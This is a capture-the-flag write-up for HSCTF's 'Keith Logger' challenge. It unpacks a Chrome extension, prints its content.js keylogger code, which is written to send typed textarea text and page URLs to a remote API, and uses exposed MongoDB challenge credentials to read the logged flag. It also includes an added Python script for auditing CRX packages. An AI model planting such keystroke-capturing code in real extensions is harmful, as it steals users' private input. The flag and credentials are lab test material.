# Keith Logger

```  
Keith is up to some evil stuff! Can you figure out what he's doing and find
the flag?

Note: nothing is actually saved  
```

(File(s): attachments/extension.crx)

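We're given a Chrome extension. Something to note about `.crx` files is that,
similar to `.apk` files, they're really just zips (with a small CRX header in
front of the zip data, which is why `unzip` warns about extra bytes below). As
such, we can just unzip them.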

```  
$ unzip extension.crx  
Archive: extension.crx  
warning [extension.crx]: 593 extra bytes at beginning or within zipfile  
(attempting to process anyway)  
inflating: jquery-3.3.1.min.js  
inflating: manifest.json  
inflating: content.js  
```

Let's have a look at the `content.js`.

```javascript  
var timeout_textarea;
var xhr_textarea;

$("textarea").on("keyup", function() {
    if (timeout_textarea) {
        clearTimeout(timeout_textarea);
    }

    if (xhr_textarea) {
        xhr_textarea.abort();
    }

    timeout_textarea = setTimeout(function() {
        var xhr = new XMLHttpRequest();
        /*
        xhr.open(
            "GET",
            "https://keith-logger.web.chal.hsctf.com/api/record?text=" +
            encodeURIComponent($("textarea").val()) +
            "&url=" + encodeURIComponent(window.location.href),
            true
        );*/

        // send a request to admin whenever something is logged, not needed anymore after testing
        /*
        xhr.open(
            "GET",
            "https://keith-logger.web.chal.hsctf.com/api/admin",
            true
        );*/

        xhr.send();
    }, 2000);
});
```

Looks like we found the API page: https://keith-logger.web.chal.hsctf.com/api/admin
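
The two steps so far, unpacking the `.crx` and reading its scripts for endpoints, can be done in one pass when auditing an extension. The following is an added example, not part of the original writeup: it parses the `Cr24` header to locate the ZIP data and lists every URL hardcoded in the packaged files, commented-out code included. The sample archive, the host `logger.example.test`, the 581-byte header (chosen so the prefix is 593 bytes, like the `unzip` warning) and the function names are constructed for illustration.

```python
import io
import re
import struct
import zipfile

URL_RE = re.compile(rb"https?://[^\s\"'<>)]+")


def crx_zip_offset(data: bytes) -> int:
    """Return the offset of the ZIP archive that follows the CRX header."""
    if data[:4] != b"Cr24":
        raise ValueError("missing Cr24 magic: not a CRX file")
    (version,) = struct.unpack_from("<I", data, 4)
    if version == 2:  # magic, version, public key length, signature length
        pub_len, sig_len = struct.unpack_from("<II", data, 8)
        offset = 16 + pub_len + sig_len
    elif version == 3:  # magic, version, length of the signed header
        (header_len,) = struct.unpack_from("<I", data, 8)
        offset = 12 + header_len
    else:
        raise ValueError(f"unsupported CRX version {version}")
    if data[offset:offset + 4] != b"PK\x03\x04":
        raise ValueError("no ZIP local file header after the CRX header")
    return offset


def hardcoded_urls(data: bytes) -> dict:
    """Map each text member to the URLs in it, commented-out code included."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data[crx_zip_offset(data):])) as zf:
        for name in zf.namelist():
            if name.endswith((".js", ".json", ".html")):
                found = URL_RE.findall(zf.read(name))
                urls = sorted({u.decode(errors="replace") for u in found})
                if urls:
                    findings[name] = urls
    return findings


def build_sample_crx() -> bytes:
    """Constructed sample: version-3 layout with a zeroed 581-byte header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", '{"name": "sample", "manifest_version": 2}')
        zf.writestr("content.js",
                    '/* xhr.open("GET", "https://logger.example.test/api/record'
                    '?text=" + t, true); */\n'
                    '// xhr.open("GET", "https://logger.example.test/api/admin");\n')
    return b"Cr24" + struct.pack("<II", 3, 581) + bytes(581) + buf.getvalue()
```

Calling `hardcoded_urls(open("extension.crx", "rb").read())` on a real package gives the list of endpoints to review, which is how leftover debug routes like the one above get caught before release.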

Let's give it a visit.

![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-HSCTF6/images/keith-logger-1.png)

Looks like we found the MongoDB server. Let's go ahead and connect to it to
get the flag.

```  
$ mongo keith-logger-mongodb.web.chal.hsctf.com:27017 -u admin -p keithkeithkeith --authenticationDatabase "admin"
MongoDB shell version v4.0.10
connecting to: mongodb://keith-logger-mongodb.web.chal.hsctf.com:27017/test?authSource=admin&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("05235c05-5480-45f1-a5af-b540d8335c38") }
MongoDB server version: 4.0.10
> use database
switched to db database
> show collections
collection
> db.collection.find()
{ "_id" : ObjectId("5cf0512d464d9fe1d9915fbd"), "text" : "are kitties cool", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:54:53.925045" }
{ "_id" : ObjectId("5cf051a95501f2901a915fbd"), "text" : "because i think they are", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:56:57.974856" }
{ "_id" : ObjectId("5cf051b3464d9fe1d9915fbe"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:57:07.295378" }
{ "_id" : ObjectId("5cf0520b464d9fe1d9915fbf"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:35.030635" }
{ "_id" : ObjectId("5cf05212464d9fe1d9915fc0"), "text" : "if you're looking for the flag", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:42.170470" }
{ "_id" : ObjectId("5cf0521b5501f2901a915fbe"), "text" : "it's hsctf{watch_out_for_keyloggers}", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:51.359556" }
```

Found the flag.

```  
hsctf{watch_out_for_keyloggers}  
```

Original writeup (https://github.com/shawnduong/ctf-writeups/blob/master/2019-HSCTF6/Web/keith-logger.md).